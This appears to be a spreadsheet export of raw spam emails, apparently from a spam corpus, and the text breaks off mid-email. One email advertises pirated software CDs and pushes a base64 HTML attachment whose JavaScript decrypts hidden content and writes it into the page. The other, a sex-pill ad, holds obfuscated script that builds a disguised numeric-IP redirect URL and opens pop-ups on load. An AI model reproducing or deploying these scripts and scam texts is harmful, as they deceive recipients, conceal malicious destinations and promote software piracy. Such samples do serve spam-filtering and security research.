    <t xml:space="preserve">Subject: Customized Warez CDs
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00D1_61B37D4A.A0476B56
 Content-Type: text/html; charset="iso-8859-1"
 &lt;TABLE cellSpacing=0 cellPadding=0 width=725 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top width=470 rowSpan=2&gt;
 &lt;TABLE height=111 cellSpacing=0 cellPadding=0 width=723 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top width=723 colSpan=4 
 height=111&gt;&lt;B&gt;&lt;FONT color=#ff6600&gt;Introduction&lt;/FONT&gt;&lt;/B&gt; &lt;BR&gt;We sell Backup 
 CDs, also known as Warez CDs. Backup CDs are copies of Software. 
 &lt;P&gt;For example if you go into a shop and buy Windows XP Pro, for about $299 you 
 get the Serial, the CD, the Box and the Manual.&lt;BR&gt;&lt;BR&gt;If you order it off us, 
 you get:&lt;BR&gt;The Windows XP CD and the Serial Number. It works exactly the same, 
 but you don't get the manual and box and the price is only $19.99.&lt;BR&gt;That is a 
 saving of $280, and the only difference is you don't have a colorful box and 
 manual - which are not very 
 useful.&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;B&gt;&lt;FONT color=#ff6600&gt;Features&lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;&lt;FONT face=Tahoma size=2&gt;- over 
 400 applications&lt;BR&gt;- over 1500 games&lt;BR&gt;- we reply at all your requests in a 
 few hours&lt;BR&gt;- newest releases &lt;BR&gt;- we have the best price on the WEB&lt;BR&gt;- best 
 choice of CD's ever seen on WEB&lt;BR&gt;- we ship orders to worldwide&lt;BR&gt;- secure 
 credit card processing thru our authorized on-line retailer. Your information 
 will be passed through a secure server and encrypted (128bit).&lt;/FONT&gt;&lt;/P&gt;
 &lt;P&gt;&lt;FONT face=Tahoma size=2&gt;&amp;nbsp;No need to worry about someone will steal you 
 credit card details.&lt;/FONT&gt;&lt;/P&gt;
 &lt;TABLE height=200 cellSpacing=0 cellPadding=0 width=723 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top width=159 height=200&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top colSpan=2 
 height=16&gt;&lt;B&gt;&lt;FONT color=#ff6600&gt;Most popular CD's........&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" width=61 height=12&gt;&lt;/TD&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" width=143&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top height=56&gt;&lt;IMG 
 height=56 src="http://images.amazon.com/images/P/B000063EMG.01.TZZZZZZZ.jpg" 
 width=50 border=0 NOSEND="1"&gt;&lt;/TD&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top&gt;&lt;BR&gt;Adobe PHOTOSHOP 
 7.0 finall&lt;BR&gt;&lt;B&gt;&lt;FONT color=#ff6600&gt;only: $19.99&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top colSpan=2 height=14&gt;
 &lt;HR&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top height=54&gt;&lt;IMG 
 height=51 src="http://www.relib.com/news/pic/windows_xp_white.gif" width=50 
 border=0 NOSEND="1"&gt;&lt;/TD&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top&gt;&lt;BR&gt;MS Windows XP 
 PRO.&lt;BR&gt;&lt;B&gt;&lt;FONT color=#ff6600&gt;only: $19.99&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top colSpan=2 height=14&gt;
 &lt;HR&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top height=53&gt;&lt;IMG 
 height=52 src="http://images.amazon.com/images/P/B00005AFI1.01.TZZZZZZZ.jpg" 
 width=50 border=0 NOSEND="1"&gt;&lt;/TD&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top&gt;&lt;BR&gt;MS Office XP pro 
 (3CD's)&lt;BR&gt;&lt;B&gt;&lt;FONT color=#ff6600&gt;only: $19.99&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top colSpan=2 
 height=14&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" width=14 height=200&gt;&amp;nbsp;&lt;/TD&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top width=559 height=200&gt;
 &lt;TABLE height=226 cellSpacing=0 cellPadding=0 width=485 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top width=464 
 height=18&gt;&lt;FONT color=#ff6600&gt;&lt;B&gt;Gratitude's of our 
 customers...&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top width=500 
 height=61&gt;&lt;B&gt;&lt;FONT color=#ff6600&gt;John Stewart&lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;Thanks guys, I just 
 got the set of CD's and they work as promised. You got a happy customer ready to 
 order some more and I'll send more customers. 
 &lt;HR&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top width=500 
 height=77&gt;&lt;B&gt;&lt;FONT color=#ff6600&gt;Mike Sandell&lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;I only want you to 
 now that the CD I ordered had arrived. I was a little suspicious when I ordered 
 the stuff, but I was wrong. Thanks for your services and never let the site go 
 down. 
 &lt;HR&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top width=500 
 height=70&gt;&lt;B&gt;&lt;FONT color=#ff6600&gt;Chris Anderson&lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;Top marks for an 
 excellent service. Your speed of response to my query was second to none. I'll 
 certainly be buying from you in future. Keep up the good work, guys. 
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P align=center&gt;&lt;font size="5"&gt;&lt;B&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;To 
   Order Please Open &lt;font color="#FF6600"&gt;warezcds.html&lt;/font&gt;&lt;FONT 
 color=#ff0000&gt; &lt;/FONT&gt;in Attachment&lt;/font&gt;&lt;/B&gt;&lt;/font&gt;&lt;/P&gt;
 &lt;P&gt;&amp;nbsp;&lt;/P&gt;
 6695jkxA7-447JwRJ3218JopD8-829QlEE1899mHZQ0-l41
 ------=_NextPart_000_00D1_61B37D4A.A0476B56
 Content-Type: application/octet-stream; name="warezcds.html"
 Content-Transfer-Encoding: base64
 Content-Disposition: attachment; filename="warezcds.html"
 PGh0bWw+DQoNCjxoZWFkPg0KPG1ldGEgSFRUUC1FUVVJVj0iRXhwaXJlcyIg
 Q09OVEVOVD0iSFRNTGNyeXB0Ij4NCg0KPCEtLQ0KIC0tLS0tLS0tLS0tLS0t
 LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnwgICAgICAgDQogLS0tLS0tLS0t
 LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KLS0+DQo8c2NyaXB0IGxh
 bmd1YWdlPSJKYXZhc2NyaXB0Ij4NCjwhLS0NCg0KZnVuY3Rpb24gcHJvY2Vz
 cyhhcikNCiB7DQogIHZhciBTdHJpPScnDQoNCiAgdmFyIHksIHosIHN1bSwg
 biwgbjEsIG51bWJlciwgaj0wDQogIHZhciBrZXkgPSBuZXcgQXJyYXkoMTI1
 OTMsMTI4NTAsMTMxMDUsNTApDQoNCiAgbjE9OA0KICBmb3IgKGo9MDsgajxh
 ci5sZW5ndGg7ICsraikNCiAgIHsNCiAgICBmb3IgKGk9MDsgaTxhcltqXS5s
 ZW5ndGgtMTsgKytpKQ0KICAgICB7DQogICAgICBzdW09NDA1NTYxNjk2OA0K
 ICAgICAgbj1uMQ0KICAgICAgeT1hcltqXVtpXQ0KICAgICAgej1hcltqXVsr
 K2ldDQogICAgICB3aGlsZShuLS0+MCkNCiAgICAgICB7DQogICAgICAgIHot
 PSh5PDw0KStrZXlbMl1eeStzdW1eKHk+PjUpK2tleVszXQ0KICAgICAgICB5
 LT0oejw8NCkra2V5WzBdXnorc3VtXih6Pj41KStrZXlbMV0NCiAgICAgICAg
 c3VtLT0weDlFMzc3OUI5DQogICAgICAgfQ0KDQogICAgICBTdHJpKz1TdHJp
 bmcuZnJvbUNoYXJDb2RlKHkmMHhGRikrU3RyaW5nLmZyb21DaGFyQ29kZSgo
 eT4+OCkmMHhGRikrU3RyaW5nLmZyb21DaGFyQ29kZSgoeT4+MTYpJjB4RkYp
 K1N0cmluZy5mcm9tQ2hhckNvZGUoKHk+PjI0KSYweEZGKQ0KICAgICAgU3Ry
 aSs9U3RyaW5nLmZyb21DaGFyQ29kZSh6JjB4RkYpK1N0cmluZy5mcm9tQ2hh
 ckNvZGUoKHo+PjgpJjB4RkYpK1N0cmluZy5mcm9tQ2hhckNvZGUoKHo+PjE2
 KSYweEZGKStTdHJpbmcuZnJvbUNoYXJDb2RlKCh6Pj4yNCkmMHhGRikNCiAg
 ICAgfQ0KICAgIGRvY3VtZW50LndyaXRlKFN0cmkpDQogICAgU3RyaT0nJw0K
 ICAgfQ0KICB9DQoNCmZ1bmN0aW9uIHN0YXJ0KCkgew0KdmFyIGFyPW5ldyBB
 cnJheSgpDQphclswXT1uZXcgQXJyYXkoOTIyNzIxNTczLC0xMDE1NDI4MzI4
 LDU2Nzg2NDU2OCwtMTgzNjAwNTcwNywtNzEyMDQ5MjkyLC03NDExMDI5NzYs
 MTExNjI4NTAyNCwtMzYzNTc1MTcsMjA5OTc3Mjc5OSw4MjI2NDI1MjEsLTQ5
 NzQ2NDc3NSw0MzA4MDg4MDksMTA2NDUxMTYyMiwxNzEyNjc0NTEwLC0xMDUx
 MjQwNjI2LC02MjkwNjg0MDUsMTIyNzQ1MTgxMCwxOTA0ODY2NDUsLTMyNTgz
 MDMwNiw2MTg5OTE1NTEsLTE3Nzk2NDYzNDgsMTY4NjA0MzY4LDE1MTU5MTY4
 NTEsLTIyMjUwNzkxOCwtNjE2MjYyMDE0LDE4NzUyNTA3ODgsLTE5MzM4NDE1
 MTYsMTk2NjIwNDcwNCw1ODQzOTYxODAsMTgwOTY4NDU4NCwtMzU1MDk2NDE0
 LDc2NjA2NTMwOCw5NDI4ODIwODgsMTc3NzE4NjQ3OSwtMTU2NzI2ODI0MCwx
 MzEwNDY2Mjg2LDcxMTAzNzUzMCwtMjMwODA0OTI0LDEzNzM3ODUzNzksMTEz
 MTU4NDQ4MywtNjE0NzMxNjYxLDExNDIzNzMxODgsMTQyNzE5ODQxNCwtNjc3
 MDcxOTYsMjYyNTM0MTQ4LDE1MjM0MTU1NjAsMTIwOTg3ODc5NCwtMzMyODQy
 MTAxLDUzMTI0MDIzMywtMTg1MjgyODgwLC05NDQ1ODQxLC0xMjUzOTM3MzY0
 LDkzNDMxNzk3LC0xNzY2OTAwNDI5LC0yODMyNTEyMDAsLTIwMzExMTQ5NjQs
 LTc5ODIwNTMxMywxODk4MDE4OTg0LC0xNjU2MjY3OTc0LC0xMDgwNTYxMzM4
 LDEwNzI4NjYxODAsMjAyMTk3NzExNiw3Mzc5NjU2MDcsLTE5OTU3ODA3ODgs
 LTIwMzM0NzkyNjgsNDgxODkzNzgwLDE2NzY1MTU1NTAsLTEyNTAzMzk5Miwx
 NzEzNTc2MDUzLC01MzQyOTI0OTQsMTAzNzc1NjU5LC0xMjcwOTY1OTM4LDU4
 MDA3MjQ4LC0xMzQ3NzE5NzEsMTg2MzkzODI1MSwtNzcxNjM4OTMyLC0zODEw
 ODk4ODgsLTg4NDE1ODI5Niw5NjAwOTI3OTksLTcwODI1MDczNCwxMTQyMTkw
 Mzg4LC05MjkxMjE4OTQsMTk1MjI3OTcyMyw4MTU0NzYzMjQsLTE4NjMwOTYz
 NTgsLTYzOTQ3Nzg5MSwtNDEyNDY5Mjg5LDEyODUwMjA5OSwyMDE0ODUxMDcs
 LTE1NTQ5MTk4ODEsMjExNzYzNjcyLC0xNTAxOTUxNDMxLDE1MzYyNDQzNDMs
 LTE5Nzg2NzUyMTMsLTE2MTI3MTE4MTAsLTQ0OTkyMTI1OSwtNzkxMTgzOTAx
 LC03NzU1ODExMzYsMTU1OTc4NzIwOCwtNzAwMzkwMTEwLC0xMDI2NjAxMzg1
 LC01NTE5NTk4MzAsLTIwOTcwMzM5MCwtMTM4NDA4NjMsLTIwMjY4MDkxNDMs
 MTk1OTQzNzIwOCwxNzgxNzgxNzMwLC0xMjA1ODE5MTk4LC0xMTEwMTQ5ODY1
 LC0yNTc5MjU4ODQsLTEwOTAxMTI3MTMsLTE4MTQ4OTMxMjksMzA0OTEwMTg0
 LC02OTQ4NDcwNzgsLTE3Mzk0NDg4ODAsLTQzODI4MDQxMSw3NzMxNjQ5NzEs
 LTEwOTI5NDc2NjcsLTEyOTMyNjE2MiwtMTIwNzIzNjgxMywtNDY2MDgxNDk3
 LDY0NzM2OTAyOSwtMTA3MzYwNjA4Miw3MTQwOTMyMDYsLTE2MDc0MDQ2NCwt
 MjA2NTczNTQ5LC0xODQyNjAwNjUwLDE3MTQ4ODEwMzEsMTU5MDkwMTYwNSw5
 NjA4OTU5NDIsMTk4MzkxOTc1MSw2MDk2NjI3NzIsMTEyMDU2Mjc0MiwtMTMw
 MDY2MDE2MCw4NTEyNTQ5NDMsMTE4MTQzMzA4NCwtMTk3NzQzMzYwNyw2ODM5
 NjA4MTYsLTIwNjk2OTk0NDUsLTE0MzQzNjM0MjYsLTEwNzQ2NTQ1MTAsLTE0
 MjU2NzI1NDAsMTAwOTk5NjU0MiwtMTY0MTkyNDM3MywzNTgxMjU1OTgsNTQy
 Mjc4NzQ5LDUwMTU4MTM0MCw0NzYxMzExMjEsLTE0NjUxNTkwNjQsLTQ5MjAx
 NTU1NCwtMTc5Nzc2ODYxNSwtODYzMzI2MTY4LC0xMTE0NDkxNjc5LC05NDc4
 MTU5OCwtMzA5MTI0ODkxLC0xNTY2MDI2ODY3LC0yMDIyMzc2OTQ0LDczNDU1
 NDcyNCwxNTgwMDA0NDY0LC05NzAwNDEzNCwtNzUwNDE3MzYsLTk5MzcxMTM5
 MCwtMTM0NDYxOTMxLDE2MjUyNDY4NzcsLTEyODkzNzYwMzMsLTg2MTIyNjk1
 NiwtMTY4MTM5NzYyLDk1ODU3ODc2OSwyODAwMzc5MzcsNTY2ODM4OTk5LDMw
 NjQ2MzA4OCw1NjcyOTg5OTUsLTcxMzUxNDYzMywtMTA0MjU5MjQ5NiwtNDI5
 MDA0NzMxLC0xNzU1NDc5MzA0LC05MTkxOTQ5OTMsLTc0MTQ0OTkyNSwtMTAz
 MzU0MzY3NywtMjEwNjA1MzgzMyw5NDEyNjQ2MjEsMTYwODIxNjQ1NiwtODMy
 Mzg3ODE2LC0xODE2NTY3MDI4LC0xOTMxMjY0Nzk1LC0xODIwOTc3OTkyLC0x
 NDAwOTgzNjk4LC0xMTc1OTMyNjc2LDMyNjg2NzQwOSwtMTA3NDU3MDAwLC0x
 ODc3NjIwMDcsMTg1MDQ1MzEwNywxNzEzNzkyMDY0LDY2Mjk2NjQyLC03MTIx
 ODQzODMsLTEzMDQxNjcxNjksMzA5MDA5Njg3LC0xNTQzODU0MTcsLTE4Mjc5
 OTA2NzMsMTk5MTgyOTIyNywtMTg2MjAxMDY5NSwxNTcwMTA0MTAwLC03ODQw
 NDM0NCwtMTE1NzA1NjgwNiwtMjAzNDEyOTIyMSwxMjA3NjUzMzI3LC0xNDE4
 NDI5MTE4LDEzNDU3ODQ3MjksMzEzMzU5NDYsLTkwODEwMzAwOSwtMjM0MDA1
 NjY5LDgzNzQwNDYwNiwxODA4MzM5MTEsLTIxNDI1MjMzMywxNDUyMDUwNjY1
 LC0xOTM3OTcyODQ1LC04MDM5OTM3ODEsLTE2ODUwNTkxMzgsMTgxMTU2Mjc5
 MiwxNDUxMzA5MjIsMTg2MzQwNDg3LC04Nzg2NzI0OTEsODYxNDk3NjA1LDIx
 ODE3MTc0OSwtMjE0Nzg5Mzg1LDUyNjM3NjA4NywxMzMyNzQwNjg5LDE5Njk1
 NTQ0NzksLTE3NDI0MDgzMTIsMTY3MTg1OTg2NywtMjA5MzYwMjA3OSwxMTUz
 MTYyNjIxLDk0MDcxNDYxMSwzOTI0MTYyMTEsLTE1MjAzODQxODksNTc5NTE3
 OTEyLC0xNTExMjY0OTk2LC03MDYwMTA0NjQsMTE4MTY4NzA0Myw1NTIyMTcw
 MDUsLTI0ODA4NjAxNCw5MzgwNjk5NzEsLTE3NDI0MDgzMTIsMTY3MTg1OTg2
 NywxODc0MzI5OTMsLTIxMTQwNjgxMCwxOTk2Mjc3MTg3LC0yMDY3NDM5MjQx
 LDEzNzk5MDAxMzgsLTE2Mzc2MzY2ODYsLTc1MDM2MzI4NCwyMDkwOTM1MjU0
 LDk5NzY1MDM0NywxMzIzNzI5OTQ4LC0yMDA4MzUxNDE2LDMxNzAwMDczOCw1
 OTI5MzYzNjksLTE2NjQ4MDYzODEsMjQwOTQzOTAzLC0yNTUzODU5ODksLTE1
 OTUyNjc4ODcsLTQxODYxNjAxMSwtMTMzNDkzMzA0MSwxMjY4MDE5MzEsMTA1
 MzUyOTYwMiwxMjAzOTY2NDcyLDI4MjgxMTYyMCwxNjg1MTQ4NzUzLDE2NTI2
 MTQ2MTMsMTM1MzczMzc1MykNCg0KcHJvY2VzcyhhcikNCn0NCnN0YXJ0KCkN
 Ci8vLS0+DQo8L3NjcmlwdD4NCg0KPC9ib2R5Pg0KPC9odG1sPg0K
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Improved Health                  JBTFCZ
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 4.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;title&gt;To find out more&lt;/title&gt;
 &lt;/head&gt;
 &lt;!--  --&gt;&lt;SCRIPT LANGUAGE=3D"JavaScript"&gt;IpVecIpV=3D"%3Cbody%20onload%3D%2=
 2pops%28%29%3B%22%3Cbody%22%3C%2FA%3E%3C%2FCENTER%3E";IpVeecIpV=3D"%3Cscri=
 pt%20language%3D%22Javascript1.2%22%3Evar%20num%20%3D%20%27.%27%3Bvar%20et=
 c%20%3D%22http%3A%2F%2F00000365.000000000000000000000000000%20000000000000=
 000000000000000000000365.00000000000000000000000000000000000000000364.0000=
 0000000000000000000000000000325%26amp%3B@%22%3Bbon%20%3D%20%27%27%3Bwith%2=
 0%28Math%29%20%7Bvar%20teg%20%3D%20sqrt%28sqrt%28%28PI%2A319543879.3731836=
 6%29%29%29%3Bvar%20jik%20%3D%20sqrt%28146574.02304/*%2FPI%29%3Bvar%20uyr%2=
 0%3D%20219%3Bvar%20tel%20%3D%20%28PI%2Asqrt%284859.4734979100285%29%29%3Bt=
 eg%20%3D%20round%28teg%29%3Buyr%20%3D%20round%28uyr%29%3Btel%20%3D%20round=
 %28tel%29%3Bjik%20%3D%20round%28jik%29%3B%7Drry%20%3D%20etc%20+%20bon%3B%2=
 0cjk%20%3D%20rry%20+%20jik%20+%20num%3B%20tgh%20%3D%20cjk%20+%20bon%20+%20=
 tel%3B%20uhy%20%3D%20tgh%20+%20num%3B%20yth%20%3D%20uhy%20+%20uyr%3B%20kiw=
 %20%3D%20yth%20+%20num%3B%20red%20%3D%20kiw%20+%20bon%20+%20teg%3B%20wes%2=
 0%3D%20red%20+%20%27%2F35197%27%3B%20tyh%20%3D%20wes%20+%20%2732234%2Fmd1%=
 2Fvi%27%3B%20iuj%20%3D%20tyh%20+%20%27r1001%2Fin%27%3B%20svd%20%3D%20iuj%2=
 0+%20%27%27%3B%20etc%20%3D%20svd%20+%20%27dex.html%27%3Bfunction%20pops%28=
 %29%7Bwindow.open%28%28etc%29%2C%27detail%27%2C%27width%3D775%2Cheight%3D4=
 75%2Cresizable%3Dno%2Cscrollbars%3Dyes%2Cleft%3D10%2Cto*/p%3D10%27%29%3B%7=
 D%3C%2Fscript%3E%3Cscript%20language%3D%22Javascript1.2%22%3Evar%20num%20%=
 3D%20%27.%27%3Bvar%20rmv%20%3D%22h/*ttp%3A%2F%2F00000365.00000000000000000=
 0000000000%20000000000000000000000000000000000365.000000000000000000000000=
 00000000000000000364.00000000000000000000000000000000325%26amp%3B@%22%3Bbo=
 n%20%3D%20%27%27%3Bwith%20%28Math%29%20%7Bvar%20teg%20%3D%20%28sqrt%288353=
 6.19053063838%29%2FPI%29%3Bvar%20jik%20%3D%20%28PI%2Asqrt%284727.249129886=
 58%29%29%3Bvar%20uyr%20%3D%20248%3Bvar%20tel%20%3D%20sqrt%28sqrt%28%28PI%2=
 A814873.996925124%29%29%29%3Bteg%20%3D%20round%28teg%29%3Buyr%20%3D%20roun=
 d%28uyr%29%3Btel%20%3D%20round%28tel%29%3Bjik%20%3D%20round%28jik%29%3B%7D=
 rry%20%3D%20rmv%20+%20bon%3B%20cjk%20%3D%20rry%20+%20jik%20+%20num%3B%20tg=
 h%20%3D%20cjk%20+%20bon%20+%20tel%3B%20uhy%20%3D%20tgh%20+%20num%3B%20yth%=
 20%3D%20uhy%20+%20uyr%3B%20kiw%20%3D%20yth%20+%20num%3B%20red%20%3D%20kiw%=
 20+%20bon%20+%20teg%3B%20wes%20%3D%20red%20+%20%27%2F35197%27%3B%20tyh%20%=
 3D%20wes%20+%20%2732234%2Fca5%2Fremo%27%3B%20iuj%20%3D%20tyh%20+%20%27vesy=
 s5005%2Findex.html%27%3B%20svd%20%3D%20iuj%20+%20%*/27%27%3B%20rmv%20%3D%2=
 0svd%20+%20%27%3Fredirect%3Dhttp%3A%2F%2F326841526%2Findex.html@0000000021=
 6.00000000000114.0000000000069.0000000000002%2F%7Ecyber101%2Fpages%2F%27%3=
 Bfunction%20rem%28%29%7Bwindow.open%28%28rmv%29%2C%27detail%27%2C%27width%=
 3D775%2Cheight%3D475%2Cresizable%3Dno%2Cscrollbars%3Dyes%2Cleft%3D10%2Ctop=
 %3D10%27%29%3B%7D%3C%2Fscript%3E";IpVesIpV=3D"AaMmbNnOoJjiHhWwrcekDdGgYypZ=
 zQqFfvsUulTtx1070696";function IpVcfiPv(IpV,IpVchar){var IpVidx=3D0;while(=
 IpV.indexOf(IpVchar,IpVidx)&gt;-1){IpVidx=3DIpV.indexOf(IpVchar,IpVidx);IpV=3D=
 IpV.substring(0,IpVidx)+IpV.substring(IpVidx+1,IpV.length);}return IpV;}fu=
 nction IpVcfIpV(){IpVeecIpV=3DIpVcfiPv(IpVeecIpV,'/');IpVeecIpV=3DIpVcfiPv=
 (IpVeecIpV,'*');IpVeecIpV=3Dunescape(IpVeecIpV);for(var IpViIpV=3D0;IpViIp=
 V&lt;IpVeecIpV.length; IpViIpV++){var IpVtestIpV=3D0;var IpVaIpV=3DIpVeecIpV.=
 charAt(IpViIpV);var IpVbIpV=3DIpVesIpV.indexOf(IpVaIpV);if(parseInt(IpVbIp=
 V)&gt;=3D0) IpVtestIpV=3D1;if(parseInt(IpVesIpV.charAt(IpVbIpV^6))&gt;=3D0) IpVt=
 est=3D1;if(IpVbIpV&gt;-1 &amp;&amp; IpVtestIpV=3D=3D0){IpVaIpV=3DIpVbIpV^6;IpVbIpV=3D=
 IpVesIpV.charAt(IpVaIpV);IpVeecIpV=3DIpVeecIpV.substring(0,IpViIpV)+IpVbIp=
 V+IpVeecIpV.substring(IpViIpV+1,IpVeecIpV.length);}}IpVecIpV=3DIpVcfiPv(Ip=
 VecIpV,'/');IpVecIpV=3DIpVcfiPv(IpVecIpV,'*');IpVecIpV=3Dunescape(IpVecIpV=
 );document.write(IpVeecIpV+IpVecIpV);};IpVcfIpV();&lt;/SCRIPT&gt;&lt;!-- Size: 4238=
  bytes --&gt;
 &lt;table bgColor=3D"#000000" border=3D"0" cellPadding=3D"2" width=3D"617"&gt;
   &lt;tbody&gt;
     &lt;tr&gt;
       &lt;td bgColor=3D"#333333" vAlign=3D"top" width=3D"180"&gt;
         &lt;table border=3D"0" cellPadding=3D"0" width=3D"114%" cellspacing=3D=
 "0"&gt;
           &lt;tbody&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%"&gt;&lt;font face=3D"Century Gothic" size=3D"4"&gt;=
 &lt;font color=3D"#FFFFFF"&gt;&lt;b&gt;To
                 find out more, click on&amp;nbsp; the link below&lt;/b&gt;&lt;/font&gt;&lt;st=
 rong&gt;&lt;font color=3D"#ffff00" face=3D"Arial"&gt;&lt;br&gt;
                 &lt;/font&gt;
                 &lt;/strong&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%" bgcolor=3D"#FFFFCC"&gt;
                 &lt;p align=3D"left"&gt;&lt;font color=3D"#0000FF" size=3D"5"&gt;&lt;a hr=
 ef onclick=3D"pops();"&gt;&lt;u&gt;MORE INFO&lt;/u&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%"&gt;
                 &amp;nbsp;
                 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                 &lt;p&gt;&amp;nbsp;
               &lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%"&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/tbody&gt;
         &lt;/table&gt;
       &lt;/td&gt;
       &lt;td vAlign=3D"top" width=3D"558"&gt;
         &lt;table border=3D"0" cellPadding=3D"0" height=3D"20" width=3D"510" =
 cellspacing=3D"0"&gt;
           &lt;tbody&gt;
             &lt;tr&gt;
               &lt;td align=3D"left" bgColor=3D"#FFFF00" borderColor=3D"#00000=
 0" borderColorDark=3D"#000000" borderColorLight=3D"#000000" height=3D"67" =
 vAlign=3D"center" width=3D"504"&gt;
                 &lt;p align=3D"center"&gt;&lt;font size=3D"6" face=3D"Impact"&gt;INCRE=
 ASE YOUR SEX
                 DRIVE !!!&lt;/font&gt;&lt;/p&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/tbody&gt;
         &lt;/table&gt;
         &lt;table border=3D"3" cellPadding=3D"4" cellSpacing=3D"0" width=3D"5=
 09" bordercolor=3D"#0000FF" bordercolordark=3D"#0000FF"&gt;
           &lt;tbody&gt;
             &lt;tr&gt;
               &lt;td align=3D"middle" bgColor=3D"#ffffff" vAlign=3D"center" w=
 idth=3D"317"&gt;
                 &lt;p align=3D"center"&gt;&lt;font face=3D"Albertus Extra Bold" col=
 or=3D"#000080" size=3D"6"&gt;GREAT SEX&lt;/font&gt;&lt;br&gt;&lt;font face=3D"Arial Narrow" =
 size=3D"5" color=3D"#FF0000"&gt;In A Bottle!&lt;/font&gt;&lt;/p&gt;
                 &lt;table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" wi=
 dth=3D"323"&gt;
                   &lt;tr&gt;
                     &lt;td width=3D"321"&gt;
                       &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#FF0000" size=3D=
 "5" face=3D"Albertus Medium"&gt;Knock
                 Your Sex Drive into High Gear !&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
